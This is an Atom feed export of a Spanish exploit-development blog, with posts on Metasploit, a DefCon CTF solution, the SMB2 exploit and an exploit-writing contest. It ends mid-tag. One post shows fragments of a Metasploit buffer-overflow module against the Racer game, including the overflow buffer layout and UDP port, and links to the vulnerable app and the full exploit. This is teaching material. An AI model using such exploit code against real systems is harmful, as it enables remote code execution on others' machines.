<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-1892387077578445097</id><updated>2012-02-12T03:53:29.234+01:00</updated><category term='Python'/><category term='Vulnerabilidades Software'/><category term='Trabajo'/><category term='Programacion'/><category term='Humor Malo'/><category term='Ingenieria Inversa'/><category term='Heap Spraying'/><category term='P1mp4m'/><category term='Estudios'/><category term='Metasploit'/><category term='Phising'/><category term='Certificaciones de Seguridad'/><category term='Fuzzing'/><category term='Diario'/><category term='MSFXDC'/><category term='PHP'/><category term='Auditoria'/><category term='Varios'/><category term='Inyección SQL'/><category term='Herramientas WEB'/><category term='Noticias'/><category term='Retos'/><category term='defacing'/><category term='Exploits'/><category term='Seguridad'/><category term='Vulnerabilidades WEB'/><category term='Venta de Vulnerabilidades'/><category term='Yashira Masters'/><category term='Hacking'/><category term='Ezine Yashira'/><category term='Charlas'/><category term='Buguroo'/><title type='text'>Seguridad y Contramedidas Informaticas - Trancek</title><subtitle type='html'>Es un sitio donde aprender y enseñar como protegernos en este mundillo.</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://www.trancek.es/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://www.trancek.es/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>63</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-5793173808705562579</id><published>2011-03-30T21:02:00.004+02:00</published><updated>2011-03-30T21:07:12.137+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Fuzzing'/><category scheme='http://www.blogger.com/atom/ns#' term='Hacking'/><category scheme='http://www.blogger.com/atom/ns#' term='Vulnerabilidades Software'/><category scheme='http://www.blogger.com/atom/ns#' term='Buguroo'/><category scheme='http://www.blogger.com/atom/ns#' term='Seguridad'/><category scheme='http://www.blogger.com/atom/ns#' term='Auditoria'/><title type='text'>Cómo buscar vulnerabilidades en software</title><content type='html'>Hace mucho que no escribo nada, y esta vez será solo para recomendaros un artículo. El artículo describe las formas de búsqueda de vulnerabilidades actuales, aunque con ingenio seguramente se os ocurra alguna que sea eficaz también.&lt;br&gt;&lt;br&gt; &lt;strong&gt;Link&lt;/strong&gt;: &lt;a href="http://blog.buguroo.com/?p=344"&gt;http://blog.buguroo.com/?p=344&lt;/a&gt;&lt;br&gt;&lt;br&gt; Saludos!!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-5793173808705562579?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/5793173808705562579/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=5793173808705562579' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/5793173808705562579'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/5793173808705562579'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2011/03/como-buscar-vulnerabilidades-en.html' title='Cómo buscar vulnerabilidades en software'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-5833174436016580726</id><published>2009-09-28T19:37:00.003+02:00</published><updated>2009-09-28T19:44:03.726+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Ingenieria Inversa'/><category scheme='http://www.blogger.com/atom/ns#' term='Vulnerabilidades Software'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploits'/><title type='text'>La guinda del pastel de SMB2</title><content type='html'>Bueno, hace tiempo os sonaría haber oido algo de que se había encontrado un fallo en windows vista y 7 que podía ser afectado de forma bestia por redes. Y aunque fue categorizado como DOS primeramente por Laurent Gaffié, el cual no pensaba que fuera posible explotar, después de una llamada de atención por parte de algunos, yo sólo sé de &lt;a href="http://blog.48bits.com/"&gt;48bits.com&lt;/a&gt; así que no sé si fueron los primeros. Decían en su blog que era posible explotarlo y así fue, no tardarían en investigar la gente el tema. Y hasta ahora todo era privado, pero metasploit lo acaba de publicar: &lt;a href="http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/smb/smb2_negotiate_func_index.rb"&gt;http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/smb/smb2_negotiate_func_index.rb&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Os recomiendo echarle un ojo para aprender bastante, ya que han ido explicando los autores como lo han hecho.&lt;br /&gt;&lt;br /&gt;Un saludete&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-5833174436016580726?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/5833174436016580726/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=5833174436016580726' title='3 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/5833174436016580726'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/5833174436016580726'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2009/09/la-guinda-del-pastel-de-smb2.html' title='La guinda del pastel de SMB2'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-4250176301102970040</id><published>2009-08-16T22:02:00.003+02:00</published><updated>2009-08-16T22:14:45.124+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Vulnerabilidades Software'/><category scheme='http://www.blogger.com/atom/ns#' term='Seguridad'/><category scheme='http://www.blogger.com/atom/ns#' term='Python'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploits'/><title type='text'>Proyecto EEW(Expert Expoit Writer)</title><content type='html'>Os voy a hablar de un proyecto que se traen entre manos desde hace tiempo boken y yibam.&lt;br /&gt;&lt;br /&gt;El proyecto en sí es la creación de una herramienta capaz de generar exploits a partir de un PoC en ficheros script de python completamente funcionales por sí solos.&lt;br /&gt;&lt;br /&gt;Os copio parte de los blogs de yibam y boken:&lt;br /&gt;&lt;br /&gt;El usuario indicaría la longitud de la cadena que provoca el Buffer Overflow, la via por la cual el software vulnerable es capaz de recibir dicha cadena. Por linea de comandos, en forma de fichero interpretables por el software vulnerable, por conexión de red (socket), como argumento de una función de una libreria .dll, etc... Y la herramienta comienza todo el proceso de análisis.&lt;br /&gt;&lt;br /&gt;El análisis automático que realiza la herramienta, consiste en montar la PoC y lanzarlo contra el software vulnerable para provocar el crash de Access Violation. Debido a la infinidad de casos, la herramienta va salvando los diferentes obstáculos (AntiDEP, SafeSEH, excepciones de escritura o lectura de ciertas direcciones, localización de direcciones validas para hacer un trampolin valido, etc...) hasta llegar a sobreescribir EIP y con toda esa información, crear un script .py que al lanzarlo de manera independiente, sea capaz de ejecutar una shellcode explotando el fallo indicado por la PoC en el software vulnerable.&lt;br /&gt;&lt;br /&gt;----&lt;br /&gt;&lt;br /&gt;Bueno, os dejo que descubrais vosotros mismo las grandes utilidades que va a tener, de momento se puede usar en modo API, y como bien dicen ellos, el framework Sulley...que es para fuzzing, se podría acoplar y hacer...maravillas!!! ejeje&lt;br /&gt;&lt;br /&gt;En el apartado de links de distintos blogs aparecen los blogs de yibam y boken y el link del proyecto es el siguiente:&lt;a href="http://www.expertexploitwriter.com/"&gt;EEW(Exploit Expert Writer)&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;La única pega que le pongan el nombre en inglés jejej&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-4250176301102970040?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/4250176301102970040/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=4250176301102970040' title='3 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/4250176301102970040'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/4250176301102970040'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2009/08/proyecto-eewexpert-expoit-writer.html' title='Proyecto EEW(Expert Expoit Writer)'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-5714997596276104842</id><published>2009-07-20T22:19:00.002+02:00</published><updated>2009-07-20T22:24:16.381+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Ingenieria Inversa'/><category scheme='http://www.blogger.com/atom/ns#' term='Vulnerabilidades Software'/><category scheme='http://www.blogger.com/atom/ns#' term='Seguridad'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploits'/><title type='text'>Pwtent Pwnables 100 - Solucion Defcon</title><content type='html'>Ya que hace tanto que no escribo en el blog, os dejo un zip con una solución de una prueba de la DefCon que trataba del tema que más me gusta, el exploiting jeje.&lt;br /&gt;&lt;br /&gt;Ahí tenéis el link para descargar: &lt;a href="http://g30rg3x.com/wp-files/defcon/ctf-quals-2009/pwtent_pwnables_100-solucion-por-trancek.zip"&gt;100 Pwtent Pwnables&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Decir que el zip contiene pdf y docx, además de incluir otros archivos que en el pdf no he podido meter o se ven mal. En el documento docx está todos los archivos incluidos y la imagen si se ve bien.(El pdf lo cree desde el office, por eso se ve mal xD).&lt;br /&gt;&lt;br /&gt;Espero que os guste y cualquier duda o sugerencia, son bienvenidas :p&lt;br /&gt;&lt;br /&gt;Por cierto, contiene un exploit remoto hecho para metasploit :P&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-5714997596276104842?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/5714997596276104842/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=5714997596276104842' title='2 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/5714997596276104842'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/5714997596276104842'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2009/07/pwtent-pwnables-100-solucion-defcon.html' title='Pwtent Pwnables 100 - Solucion Defcon'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-3430022049306252298</id><published>2009-06-21T23:01:00.003+02:00</published><updated>2009-06-21T23:11:09.329+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Diario'/><title type='text'>Fin de curso</title><content type='html'>Pues eso, al haber acabado el curso, ya por fin tendré tiempo para escribir por aquí y por allá, y actualizarme que llevo tiempo sin hacerlo y bueno hacer alguna salida por ahí como la del Asegura IT, que menudos cracks habia juntos.&lt;br /&gt;&lt;br /&gt;Seguiré con los exploits que hice hace tiempo para el concurso, los cuales algunos ya están en metasploit oficialmente y bueno, veremos a ver si puedo sacar los concursos de exploiting de crackslatinos, que hay uno muy interesante que si lo hago, me cargo el DEP de forma brusca y a lo bestia.&lt;br /&gt;&lt;br /&gt;Luego seguiré si tengo tiempo con los retos(haciendo y jugando xD)&lt;br /&gt;&lt;br /&gt;Y a ponerse con hacking web, reversing y exploiting en linux, y lo que de tiempo.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-3430022049306252298?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/3430022049306252298/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=3430022049306252298' title='3 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/3430022049306252298'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/3430022049306252298'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2009/06/fin-de-curso.html' title='Fin de curso'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-605951333625758713</id><published>2009-03-04T22:25:00.004+01:00</published><updated>2010-01-15T22:44:05.136+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='MSFXDC'/><category scheme='http://www.blogger.com/atom/ns#' term='Vulnerabilidades Software'/><category scheme='http://www.blogger.com/atom/ns#' term='Metasploit'/><title type='text'>Metasploit -&gt; MSFXDC(Protocolo UDP)</title><content type='html'>&lt;span style="font-size:180%;"&gt;&lt;span style="font-weight: bold;"&gt;Remotos:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt; &lt;span style="font-style: italic; font-weight: bold;"&gt;&lt;span style="font-size:130%;"&gt;UDP&lt;/span&gt;:&lt;/span&gt; racer_bof.rb&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Descripcion:&lt;/span&gt; Racer v0.5.3 beta 5(09-03-07):&lt;br /&gt;   Es un exploit que trata sobre un juego de carreras y que escucha en un puerto, el 26000(UDP).&lt;br /&gt;   Esto ya nos da bastantes pistas para comenzar.&lt;br /&gt; &lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Requisitos:&lt;/span&gt;&lt;br /&gt;   De momento vamos a abrir los archivos que tratan de las conexiones UDP.&lt;br /&gt;&lt;br /&gt;   1º-C:\Documents and Settings\user\Datos de programa\msf32\lib\msf\core\exploit\udp.rb&lt;br /&gt;   2º-C:\Documents and Settings\user\Datos de programa\msf32\lib\rex\socket\udp.rb&lt;br /&gt;&lt;br /&gt;   Está bastante comentado así que podeis entenderlo fácilmente si estáis relacionados con&lt;br /&gt;   la programación en ruby u otro lenguaje que se le parezca.&lt;br /&gt; &lt;br /&gt; &lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Exploit:&lt;/span&gt;&lt;br /&gt;   Hay que incluir una línea para indicar que usaremos ese protocolo, justo despeus de definir&lt;br /&gt;   la clase &lt;span style="font-style: italic;"&gt;Metasploit3&lt;/span&gt;&lt;br /&gt;   ########################################################################################################&lt;br /&gt;  &lt;span style="color: rgb(51, 51, 255);"&gt; include Msf::Exploit::Remote::Udp&lt;/span&gt;&lt;br /&gt;########################################################################################################&lt;br /&gt;&lt;br /&gt;   En la definicion de exploit, podemos poner varias lineas:&lt;br /&gt;   ########################################################################################################&lt;br /&gt;   &lt;span style="color: rgb(51, 51, 255);"&gt;connect_udp&lt;/span&gt; #--&gt; Crea una conexion con el protocolo udp para enviar datos&lt;br /&gt;&lt;br /&gt;   &lt;span style="color: rgb(51, 51, 255);"&gt;buf = 'A' * 1001 + [target.ret].pack('V') + payload.encoded + 'B' * (1196 - payload.encoded.length)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;  &lt;span style="color: rgb(51, 51, 255);"&gt; udp_sock.put(buf)&lt;/span&gt; #--&gt; Envia mediante udp lo que hay en buf, este es el único definido en el 2º archivo.  &lt;br /&gt;         &lt;br /&gt;  &lt;span style="color: rgb(51, 51, 255);"&gt; handler&lt;/span&gt; #--&gt; Controla la conexion&lt;br /&gt;&lt;br /&gt;   &lt;span style="color: rgb(51, 51, 255);"&gt;disconnect_udp&lt;/span&gt; #--&gt; Y termina la conexion&lt;br /&gt;   ########################################################################################################&lt;br /&gt;&lt;br /&gt;   Tambien es importante la siguiente parte de código que va en otra parte dentro del exploit:&lt;br /&gt;   ########################################################################################################&lt;br /&gt;   &lt;span style="color: rgb(51, 51, 255);"&gt;register_options(&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;                    [&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;                        Opt::RPORT(26000) #Puerto especificado por defecto&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;                    ], self.class)&lt;/span&gt;&lt;br /&gt;   ########################################################################################################&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Download App Vuln&lt;/span&gt;: &lt;a href="https://www.securinfos.info/old_softwares_vulnerable/racer053b5.rar"&gt;https://www.securinfos.info/old_softwares_vulnerable/racer053b5.rar&lt;/a&gt;&lt;br /&gt; &lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Link del exploit: &lt;/span&gt;&lt;a href="https://www.securinfos.info/metasploit/racer_bof.rb"&gt;https://www.securinfos.info/metasploit/racer_bof.rb&lt;/a&gt; ó &lt;a href="http://www.metasploit.com/modules/exploit/windows/games/racer_503beta5"&gt;http://www.metasploit.com/modules/exploit/windows/games/racer_503beta5&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------&lt;br /&gt;&lt;br /&gt;Bueno en principio tenía pensado depurarlo de nuevo para ver mejor el espacio real para la shellcode y ajustarlo en el exploit, o badchars e incluso referencias, pero ando bastante jodido de tiempo, así que si alguno quiere bienvenido sea. Además me imagino que la dirección de la dll es universal, pero podéis agregar otras versiones que seguramente sea vulnerable en otras y asi hacerlo más universal todavía :P&lt;br /&gt;&lt;br /&gt;Saludos y espero que a alguno le sirva.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-605951333625758713?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/605951333625758713/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=605951333625758713' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/605951333625758713'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/605951333625758713'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2009/03/metasploit-msfxdcprotocolo-udp.html' title='Metasploit -&gt; MSFXDC(Protocolo UDP)'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-6279604171789225376</id><published>2009-02-24T18:59:00.001+01:00</published><updated>2009-02-24T19:01:34.079+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Diario'/><title type='text'>Ausencia de posts xD</title><content type='html'>Bueno tengo en mente tratar algunas cosas que he dicho que iba a tratar pero por circunsanticas personales no he podido así que a partir del finde espero rellenar el blog con algunso temas de exploits que me quedé a medias y alguna cosilla más.&lt;br /&gt;&lt;br /&gt;Saludos si alguien me lee jeje.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-6279604171789225376?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/6279604171789225376/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=6279604171789225376' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/6279604171789225376'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/6279604171789225376'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2009/02/ausencia-de-posts-xd.html' title='Ausencia de posts xD'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-5729720076348709945</id><published>2009-02-14T11:54:00.007+01:00</published><updated>2009-02-14T15:53:42.870+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Vulnerabilidades Software'/><category scheme='http://www.blogger.com/atom/ns#' term='Metasploit'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploits'/><title type='text'>Exploits hechos para el MSFXDC(1)</title><content type='html'>Bueno en determinados temas del blog iré mostrando los exploits hechos y además como han sido desarrollados y  los que no hice desde 0, serán llevados del lenguaje que tuvieran en milw0rm a ruby para metasploit. Iré mostrando las similitudes que tienen entre ellos y cómo es fácil desarrollar un exploit que se basa en los mismos tipos de vulnerabilidades, locales, remotos, mismos protocolos, etc. Metasploit está preparado para gran número de exploits aunque todavía le faltan algunos protocolos para no tener que enviar muchos bytes de un protocolo en especial mediante tcp/ip.&lt;br /&gt;&lt;br /&gt;De forma general los divido en 3 categorías, entendéreis el porqué.&lt;br /&gt;Voy a dividir los exploits remoto de manera que los 2 primeros tipos son genéricos y cuando vayan saliendo protocolos conocidos FTP, SMTP, IMAP...etc, los iré poniendo separados. Por ejemplo en las siguientes categorías:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:180%;"&gt;&lt;span style="font-weight: bold;"&gt;REMOTOS:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;::TCP&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;::UDP&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;::FTP&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;::Otros Protocolos(IMAP,SMTP...)&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;::Explotados con Navegador(Especialmente Activex)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:180%;"&gt;&lt;span style="font-weight: bold;"&gt;LOCALES:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;::FILEFORMAT&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:180%;"&gt;&lt;span style="font-weight: bold;"&gt;WEBAPP:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;::RFI&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;::RCE&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Muchos de los subtipos, se pueden hacer de forma casi genérica, sólo cambiando lo esencial.&lt;br /&gt;Como dije iremos viendo de todo tipo, mientras tanto boken escribirá algo más relacionado con Metasploit en general, que cómo veréis será muy interesante.&lt;br /&gt;Con esto aprenderéis la forma rápida de hacer vuestro exploit y de probar con el mismo Metasploit si no sabéis programar con protocolos.&lt;br /&gt;&lt;br /&gt;Decir, que estéis atentos a la herramienta de Jerome Athias, MSF-XB:&lt;br /&gt;&lt;a href="https://www.securinfos.info/metasploit/MSF-XB.php"&gt;https://www.securinfos.info/metasploit/MSF-XB.php&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Más que nada, porque se va actualizando y hablaré con él la forma de poder elegir para hacer ciertos exploits. Para que sea casi for dummies jeje, para así hacer de Metasploit una herramienta muy buena para las auditorías.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-5729720076348709945?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/5729720076348709945/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=5729720076348709945' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/5729720076348709945'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/5729720076348709945'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2009/02/exploits-hechos-para-el-msfxdc1.html' title='Exploits hechos para el MSFXDC(1)'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-9194720248667641739</id><published>2009-02-03T17:40:00.002+01:00</published><updated>2009-02-03T18:57:05.747+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking'/><category scheme='http://www.blogger.com/atom/ns#' term='Vulnerabilidades Software'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploits'/><title type='text'>MetaSploit Framework eXploits Development Contest</title><content type='html'>Feliz 2009, más que nada porque llevo más de dos meses sin escribir por aquí jeje. Y bueno aprovecho el primer post de este año a este concurso.&lt;br /&gt;&lt;br /&gt;El concurso organizado por Jerome Athias de JA-PSI, trataba de conseguir el mayor número de puntos. Éstos se podían conseguir dependiendo del tipo de exploit que hicieras, si era un poc, un exploit para aplicaciones web, o si eran locales o remotos funcionales. Todo ello portado para metasploit. En el link del final tenéis mejor la info del concurso y los exploits mandados al mismo.&lt;br /&gt;&lt;br /&gt;La verdad fue un mes duro ya que todo exploit portado de milw0rm a metasploit tenía que probarlo en mi máquina, ello implica buscar la app vulnerable, ajustarlo a mi sistema y que funcione de forma simple(Se irán mejorando con tiempo), y muchos de los probados ya estaban en metasploit o directamente la gente los envió a milw0rm como buenos y luego realmente tienen filtros u otras cosas que hacen que no funcionen. Vamos que sobreescriben el ret con AAAA y luego los 4 siguientes BBBB, y como eip es 41414141 y esp 42424242, a la hora de modificarlo ponen una shellcode cualquiera y un salto a esp en EIP y aunque no lo prueben lo mandan...Eso lo ví en varios desbordamientos de pila.&lt;br /&gt;&lt;br /&gt;Además, aunque personalmente veía mal que enviasen webapp porque metasploit está enfocado más en otro tipo de aplicaciones, me puse a fondo para conseguir ventaja y hasta envié yo webapp sin probar, pero que modificados casi nada, son todos iguales(los RFI jeje).&lt;br /&gt;&lt;br /&gt;Así que después de tanto currar al final tuve lo prometido, gané y me enviaron el premio sin problemas a mi cuenta, y además estoy apuntado para la FRHACK, conferencia a la que me gustaría ir, si alguien de España lee esto y se apunta que me diga que voy sólo jeje. Hablaré de ella en otro momento :D.&lt;br /&gt;&lt;br /&gt;Finalmente, agradecer a Jerome Athias porque las veces que hablé con él fue muy majo y por organizar este tipo de concursos, que más que nada era me animaba a hacer exploits para metasploit, cosa que tenía pensado hacer pero que nunca me animaba.&lt;br /&gt;Así que parte de lo aprendido, lo plasmaré en algún lugar o mi amigo Boken lo hará con sus tutos.&lt;br /&gt;&lt;br /&gt;Tutos para hacer exploits para metasploit:&lt;br /&gt;&lt;a href="http://ricardonarvaja.info/WEB/OTROS/EXPLOIT/Desarrollo%20de%20exploits%20con%20Metasploit%203%20desde%20cero%20-%20Parte%201%20-%20Boken.rar"&gt;Desarrollo de Exploits para Metasploit 3 desde cero - Parte 1 - Boken&lt;/a&gt;&lt;br /&gt;&lt;a href="http://ricardonarvaja.info/WEB/OTROS/EXPLOIT/Desarrollo%20de%20exploits%20con%20Metasploit%203%20desde%20cero%20-%20Parte%202%20-%20Boken.rar"&gt;Desarrollo de Exploits para Metasploit 3 desde cero - Parte 2 - Boken&lt;/a&gt;&lt;br /&gt;&lt;a 